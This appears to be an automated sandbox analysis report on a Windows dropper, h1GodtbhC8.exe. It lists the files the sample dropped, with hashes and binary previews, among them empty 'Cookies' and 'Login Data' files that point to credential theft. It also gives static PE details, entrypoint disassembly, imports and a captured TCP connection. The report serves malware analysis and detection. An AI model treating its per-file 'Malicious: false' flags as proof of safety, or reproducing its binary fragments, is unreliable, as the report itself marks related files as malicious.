SSDEEP:	96:PAWqGuIO1w7JElw764ulqk4uWdCXufAx8Su2yk:oWaIO1S7ulqBhv+yk
MD5:	04F3C7753A4FCABCE7970BFA3B5C76FF
SHA1:	34FC37D42F86DAC1FD1171A806471CDFEAE9817B
SHA-256:	A735E33A420C2AD93279253BC57137947B5D07803FF438499AAAF6FD0692F4CD
SHA-512:	F774FC3F3EBF029DC6F122669060351CC58AE27C5224ABE2A6C8AB1308C4B796657D2F286760EB73A2AE7563EEEF335DAA70ED5E4B2560D34CA9873017658AFE
Malicious:	false
Reputation:	low
Preview:	..MZ.........0......8-..@.8.0..p.........!...L.!This. program. cannot .be run i.n DOS mo.de....$...PE..L....d82........!..0............. ..B................... ...........@....-......#......`....O...+h..........(.Q..........8W.....O......HA...text..........u.[.......`.rsrc...M;.}.t.......@.0relo...U..)......B.......5...&......S..4o.......F.......s....(.......(....{.%...{.9....[...4...(".....}...."}A...}....D.}..6..B.(...+D... 6..si..........0.....,....(.....~......oRj..&.....N"(@M.-...on.A..0......!H.(...o...."r..p(...(.E..r@.po.@.....o..........%.B.....(.@........o...&..% ....o.x......u...,..B...o!..B!....!...~...Tu.."..[......#E..8...o"..$Q ....c..o........`......IT..G.:. `....@;.`.0...`. 5.@.r?..pB1..s#.....A.R.%.r..p.%.DrW...%..rFq .b..s....%.o%@.%.oB&....o'...Do(..........o)......"o.>.o+..,oE..,a..+?.,-.@.t.7.a-%o......Yo/.../.o.].....-...r..../. #"...1..-......u.>....., ...o2......#...>....L....X..a"0.$..V..h".r..."3a..r.`.rZ@..p.(4 ....+!rh..c.B..r...po..D.U....

C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibClr.dll Download File
Process:	C:\Users\user\Desktop\h1GodtbhC8.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	52520
Entropy (8bit):	6.011934677477037
Encrypted:	false
SSDEEP:	1536:9GyM4uxlvOe/c1xpfLIa97v3A5KobiPWh:9G1vt/g7fLb97Y5VmY
MD5:	928E680DEA22C19FEBE9FC8E05D96472
SHA1:	0A4A749DDFD220E2B646B878881575FF9352CF73
SHA-256:	8B6B56F670D59FF93A1C7E601468127FC21F02DDE567B5C21A5D53594CDAEF94
SHA-512:	5FBC72C3FA98DC2B5AD2ED556D2C6DC9279D4BE3EB90FFD7FA2ADA39CB976EBA7CB34033E5786D1CB6137C64C869027002BE2F2CAD408ACEFD5C22006A1FEF34
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: KeJ7Cl7flZ.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d82............!..0.................. ........... ....................... ............@.....................................O.......h...............(...............8............................................ ............... ..H............text........ ...................... ..`.rsrc...h...........................@..@.reloc..............................@..B........................H........S..4o..........................................................F......s....(......(......{......{......{......{......(......}......}......}.......}....6..{....(...+..{......6..si...........0...........(.....~........oj...&~.......N(....-.~.....on....0..........(....o......r...p(....(....r...po.......o...........%.~.......(..........o....&........o .......u....,.~......o!...on... ...!...~..u....,.~......o!...on... ..."...[..u....,.~......o!...on... ...#

C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\sib.dat Download File
Process:	C:\Users\user\Desktop\h1GodtbhC8.exe
File Type:	data
Category:	dropped
Size (bytes):	1864
Entropy (8bit):	4.120386562888434
Encrypted:	false
SSDEEP:	48:1AC+F9cbv+WfJBHIxp3Cub2/SG+Degz21A:W3M/xBH+yTSG+S9A
MD5:	F3C315D955C48E6071E1BC1C87C46FD7
SHA1:	82340C833CAC7048E1A58A3EC40EB4540535E2A4
SHA-256:	D09D9E3F16C53ABEB7F25D408F686C708C6240971FC46AF7BF68EC5BD7846724
SHA-512:	7D7C1AF8549E21A045B9983D7B67BBA347823955B829A4ACFB0DD1878DBB34D7EA320B3FA9D7F5FF028E2793B5B852B668BFE4213FFF8678FB87B9F7B4295256
Malicious:	false
Reputation:	low
Preview:	...&{.7.C.9.9.9.A.A.A.-.B.9.1.E.-.4.8.7.E.-.9.7.B.D.-.7.6.1.9.B.4.5.5.3.2.F.4.}.....p.3.........................a.d.m.i.n.....0...0...0.............I.:.\.n.e.w._.k.i.l.l.\.p.3.\.e.x.e.....p.3.(.1.)...e.x.e..E.{. "appVersion": "6.0.8",. "arpNoRemove": true,. "arpNoRepair": true,. "arpNoShow": true,. "lang": "en-US",. "productCode": "{7C999AAA-0000-487E-97BD-7619B45532F4}",. "uiScriptTest": false,. "uid": "{FC53B0A8-C9C1-4544-9DD9-C73A991A2A42}",. "upgradeCode": "{9FF45220-3173-4DBF-A859-03B8BC20235F}".}...!%.S.y.s.t.e.m.R.o.o.t.%.\.S.y.s.t.e.m.3.2.\.S.H.E.L.L.3.2...d.l.l.,........................................................&{.0.0.7.6.C.E.B.B.-.D.4.4.3.-.4.3.C.7.-.9.2.A.5.-.C.4.8.7.F.2.B.5.F.5.4.A.}.........s.e.t.u.p.........I.:.\.n.e.w._.k.i.l.l.\.p.3.\.s.e.t.u.p...e.x.e.................T.e.m.p.\.0.\.s.e.t.u.p...e.x.e.....-.s.........................................]{."ignoreFailure": false,."uiDisabled" : false,."uiHidden" : false,."uiUnSelected" : false

C:\Users\user\AppData\Local\Cookies1607153318005 Download File
Process:	C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Reputation:	high, very likely benign file
Preview:

C:\Users\user\AppData\Local\Login Data1607153318005 Download File
Process:	C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Reputation:	high, very likely benign file
Preview:

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\h1GodtbhC8.exe.log Download File
Process:	C:\Users\user\Desktop\h1GodtbhC8.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	135
Entropy (8bit):	5.045303121991894
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUCztJXILKNUhh+9Am12MFuAvOAsDeieVyn:Q3La/xwczfIWW+P12MUAvvrs
MD5:	BB527FDBC763485B0662FCCFD53AA00A
SHA1:	86438ECBAF308B24FA264C7B6ECECDABD1338DC0
SHA-256:	6158C0B5B794617AAD8DA6D671FEF9EDE9CAB2AA9A9FAD91D038739DFF5CEDBD
SHA-512:	2003E36806330552D7DD5E633F24A67F2F4226C12EE43A6F79BB709727DD52910CA5EAF336F9C1E5733C66BC3075CA24CACA19D086BE373B76AA08D3FA818106
Malicious:	true
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.JScript, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Download File
Process:	C:\Program Files (x86)\71eza90awf48\aliens.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	484442112
Entropy (8bit):	0.1423199278620483
Encrypted:	false
SSDEEP:
MD5:	09AEEBF8415184D05EAB7B1B55748A7D
SHA1:	32E6AD80DEEEFE5E6B5F057FECEBFF4C482DEBDE
SHA-256:	A5475CE115704F3445DDD294DBBCE3DABF1303E4B0D56562A9FD41666AF3C47E
SHA-512:	F4739305BADBC17F1F765331F6A29023C6730EBF8C87642056D360E22C7C18E6C76E8CC24B0EC2D5C72E6F396B399A87C5A59E0FFBF9D66DA872CE0E4A9F967D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@............................................@.....3.!This program cannot be run in DOS mode....$.......g.&.#aH.#aH.#aH..?L.%aH.N<N. aH.N<I.,aH.#aI..aH..?L.(aH..?.."aH..?J."aH.Rich#aH.........................PE..L....sQY.................v....... .. 9............@.................................Ti....@.............................................0...........l..89..........p...T..............................@............................................text...bt.......v.................. ....rdata..(#.......$...z..............@..@.data...............................@....ndata... ...`...........................rsrc....0.......2..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI97A7.tmp Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

C:\Users\user\AppData\Local\Temp\ecv91B7.tmp Download File
Process:	C:\Users\user\AppData\Roaming\1607153318099.exe
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

C:\Users\user\AppData\Local\Temp\gdiview.msi Download File
Process:	C:\Program Files (x86)\71eza90awf48\aliens.exe
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

C:\Users\user\AppData\Local\Temp\nsh2646.tmp\Sibuia.dll Download File
Process:	C:\Users\user\Desktop\h1GodtbhC8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	540456
Entropy (8bit):	6.4900404695826275
Encrypted:	false
SSDEEP:	12288:GUBa9WxfxYRW3vwDaduy2NBCzrCJDVxsR7LafByUb2iqyTOHD:da9WxfiRCv2anZnXtLa32idOHD
MD5:	EB948284236E2D61EAE0741280265983
SHA1:	D5180DB7F54DE24C27489B221095871A52DC9156
SHA-256:	DBE5A7DAF5BCFF97F7C48F9B5476DB3072CC85FBFFD660ADAFF2E0455132D026
SHA-512:	6D8087022EE62ACD823CFA871B8B3E3251E44F316769DC04E2AD169E9DF6A836DBA95C3B268716F2397D6C6A3624A9E50DBE0BC847F3C4F3EF8E09BFF30F2D75
Malicious:	false
Joe Sandbox View:	Filename: KeJ7Cl7flZ.exe, Detection: malicious, Browse
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......A.....}...}...}^..\|...}...\|...}^..\|...}^..\|...}^..\|...}^..\|$..}...}x..}...\|...}...\|...}...\|z..}...\|...}...\|...}..?}...}..W}...}...\|...}Rich...}........................PE..L....mU_...........!.....2...................P.......................................8....@.........................@...\................"........... ..(....0..LH..X(..p....................).......(..@............P...............................text....1.......2.................. ..`.rdata...]...P...^...6..............@..@.data....I..........................@....rsrc....".......$..................@..@.reloc..LH...0...J..................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe Download File
Process:	C:\Users\user\Desktop\h1GodtbhC8.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4387715
Entropy (8bit):	7.97481744127675
Encrypted:	false
SSDEEP:	98304:MemWK3AGUr0csa0JN5DHJiLvIELr2zEj94woNcqCYX/WDvPHjAOLutkiUs:pmWK3AG6ga0jVgLIEV4FLzeDvPH5AUs
MD5:	69C9BA53239D6838D05594D96A36DEA3
SHA1:	3DE1717040C9803FF67EF6C0CD218B45FD051CA8
SHA-256:	CFAADE4B15040D0EC25112E808AAADA0BBDC378B5E4439D8C7620FEDB6359CA1
SHA-512:	FC86C62A014B11139476CF658B6EF97AB210D2A2E8B4128E58D9A186037764B328E819A345606272D5BDFDFE7729F402631214D9371BE0B60EBB7F45FCC90141
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'...Rich&...................PE..L....~.^..................................... ....@..........................0............@.............................4...4...<.... ..p.......................d"......T............................D..@............ ..`....... ....................text...*........................... ..`.rdata...... ......................@..@.data... 7..........................@....didat..............................@....rsrc........ ......................@..@.reloc..d".......$..................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\sib26E3.tmp\SibCa.dll Download File
Process:	C:\Users\user\Desktop\h1GodtbhC8.exe
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	6.867501832742936
Encrypted:	false
SSDEEP:	96:PAWqGuIO1w7JElw764ulqk4uWdCXufAx8Su2yk:oWaIO1S7ulqBhv+yk
MD5:	04F3C7753A4FCABCE7970BFA3B5C76FF
SHA1:	34FC37D42F86DAC1FD1171A806471CDFEAE9817B
SHA-256:	A735E33A420C2AD93279253BC57137947B5D07803FF438499AAAF6FD0692F4CD
SHA-512:	F774FC3F3EBF029DC6F122669060351CC58AE27C5224ABE2A6C8AB1308C4B796657D2F286760EB73A2AE7563EEEF335DAA70ED5E4B2560D34CA9873017658AFE
Malicious:	false
Preview:	..MZ.........0......8-..@.8.0..p.........!...L.!This. program. cannot .be run i.n DOS mo.de....$...PE..L....d82........!..0............. ..B................... ...........@....-......#......`....O...+h..........(.Q..........8W.....O......HA...text..........u.[.......`.rsrc...M;.}.t.......@.0relo...U..)......B.......5...&......S..4o.......F.......s....(.......(....{.%...{.9....[...4...(".....}...."}A...}....D.}..6..B.(...+D... 6..si..........0.....,....(.....~......oRj..&.....N"(@M.-...on.A..0......!H.(...o...."r..p(...(.E..r@.po.@.....o..........%.B.....(.@........o...&..% ....o.x......u...,..B...o!..B!....!...~...Tu.."..[......#E..8...o"..$Q ....c..o........`......IT..G.:. `....@;.`.0...`. 5.@.r?..pB1..s#.....A.R.%.r..p.%.DrW...%..rFq .b..s....%.o%@.%.oB&....o'...Do(..........o)......"o.>.o+..,oE..,a..+?.,-.@.t.7.a-%o......Yo/.../.o.].....-...r..../. #"...1..-......u.>....., ...o2......#...>....L....X..a"0.$..V..h".r..."3a..r.`.rZ@..p.(4 ....+!rh..c.B..r...po..D.U....

C:\Users\user\AppData\Local\Temp\sib26E3.tmp\SibClr.dll Download File
Process:	C:\Users\user\Desktop\h1GodtbhC8.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	52520
Entropy (8bit):	6.011934677477037
Encrypted:	false
SSDEEP:	1536:9GyM4uxlvOe/c1xpfLIa97v3A5KobiPWh:9G1vt/g7fLb97Y5VmY
MD5:	928E680DEA22C19FEBE9FC8E05D96472
SHA1:	0A4A749DDFD220E2B646B878881575FF9352CF73
SHA-256:	8B6B56F670D59FF93A1C7E601468127FC21F02DDE567B5C21A5D53594CDAEF94
SHA-512:	5FBC72C3FA98DC2B5AD2ED556D2C6DC9279D4BE3EB90FFD7FA2ADA39CB976EBA7CB34033E5786D1CB6137C64C869027002BE2F2CAD408ACEFD5C22006A1FEF34
Malicious:	false
Joe Sandbox View:	Filename: KeJ7Cl7flZ.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d82............!..0.................. ........... ....................... ............@.....................................O.......h...............(...............8............................................ ............... ..H............text........ ...................... ..`.rsrc...h...........................@..@.reloc..............................@..B........................H........S..4o..........................................................F......s....(......(......{......{......{......{......(......}......}......}.......}....6..{....(...+..{......6..si...........0...........(.....~........oj...&~.......N(....-.~.....on....0..........(....o......r...p(....(....r...po.......o...........%.~.......(..........o....&........o .......u....,.~......o!...on... ...!...~..u....,.~......o!...on... ..."...[..u....,.~......o!...on... ...#

C:\Users\user\AppData\Roaming\1607153318099.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

C:\Users\user\AppData\Roaming\1607153318099.txt Download File
Process:	C:\Users\user\AppData\Roaming\1607153318099.exe
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.978069787985718
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	h1GodtbhC8.exe
File size:	4671378
MD5:	3ca6df4914385efd4ba9cd239b5ed254
SHA1:	b66535ff43334177a5a167b9f2b07ade75484eec
SHA256:	0acebaf80946be0cb3099233e8807aa775c8304fc3dee48d42241ff68b7ab318
SHA512:	7951ab74ecd2ea26ed7bbcbc8bf34a770854a8fb009f256f93d72c705871b5a31c24153cc77581eec6544085cdbb51a170b2b7ef9f3f9139572b818d75424ca6
SSDEEP:	98304:ijIHEaC7gS8j+u8ME/F59JdQVDQYxb6FqrnGGs3ycc6dNIdvlDPAQ1q14gaT:ijeEaC7gS6wMEdv4BQYhGPNPgdvlDHoG
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8.....

File Icon


Icon Hash:	5c5cd81ce4e4e0e2

Static PE Info

General
Entrypoint:	0x4038af
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	be41bf7b8cc010b614bd36bbca606973

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 0040A268h
mov dword ptr [esp+14h], ebp
call dword ptr [00409030h]
push 00008001h
call dword ptr [004090B4h]
push ebp
call dword ptr [004092C0h]
push 00000008h
mov dword ptr [0047EB98h], eax
call 00007FC2DCCDE64Bh
push ebp
push 000002B4h
mov dword ptr [0047EAB0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 0040A264h
call dword ptr [00409184h]
push 0040A24Ch
push 00476AA0h
call 00007FC2DCCDE32Dh
call dword ptr [004090B0h]
push eax
mov edi, 004CF0A0h
push edi
call 00007FC2DCCDE31Bh
push ebp
call dword ptr [00409134h]
cmp word ptr [004CF0A0h], 0022h
mov dword ptr [0047EAB8h], eax
mov eax, edi
jne 00007FC2DCCDBC1Ah
push 00000022h
pop esi
mov eax, 004CF0A2h
push esi
push eax
call 00007FC2DCCDDFF1h
push eax
call dword ptr [00409260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007FC2DCCDBCA3h
push 00000020h
pop ebx
cmp ax, bx
jne 00007FC2DCCDBC1Ah
add esi, 02h
cmp word ptr [esi], bx

Rich Headers

Programming Language:

[ C ] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xac40	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x134000	0xc308	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x86000	0x994	.ndata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x728c	0x7400	False	0.656654094828	data	6.49970859063	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x9000	0x2b6e	0x2c00	False	0.367897727273	data	4.49793253515	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc000	0x72b9c	0x200	False	0.279296875	data	1.80494062846	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x7f000	0xb5000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x134000	0xc308	0xc400	False	0.0863560267857	data	2.71075910677	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x141000	0xfd6	0x1000	False	0.062744140625	PGP\011Secret Sub-key -	2.12802410158	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x134358	0x4228	data	English	United States
RT_ICON	0x138580	0x25a8	dBase III DBT, version number 0, next free block index 40, 1st item "I\310\354\377\221\347\377\377s\337\375\377\265\357\377\377\227\350\377\377\214\346\377\377\213\346\377\377\212\345\377\377\211\345\377\377\210\345\377\377\207\345\377\377\206\344\377\377\205\344\377\377\204\344\377\377U\312\355\377u\333\371\377\203\344\377\377F\301\347\377"	English	United States
RT_ICON	0x13ab28	0x1a68	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0x13c590	0x10a8	data	English	United States
RT_ICON	0x13d638	0xfe9	data	English	United States
RT_ICON	0x13e628	0x988	data	English	United States
RT_ICON	0x13efb0	0x6b8	data	English	United States
RT_ICON	0x13f668	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x13fad0	0x100	data	English	United States
RT_DIALOG	0x13fbd0	0x11c	data	English	United States
RT_DIALOG	0x13fcf0	0xc4	data	English	United States
RT_DIALOG	0x13fdb8	0x60	data	English	United States
RT_GROUP_ICON	0x13fe18	0x76	data	English	United States
RT_VERSION	0x13fe90	0x18c	PGP symmetric key encrypted data - Plaintext or unencrypted data
RT_MANIFEST	0x140020	0x2e1	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll	GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Version Infos

Description	Data
LegalCopyright
ProductVersion	0.0.0
FileVersion	0.0.0
FileDescription
Translation	0x0000 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 5, 2020 08:27:33.210081100 CET	49770	80	192.168.2.4	172.67.194.30
Dec 5, 2020 08:27:33.232074022 CET	80	49770	172.67.194.30	192.168.2.4
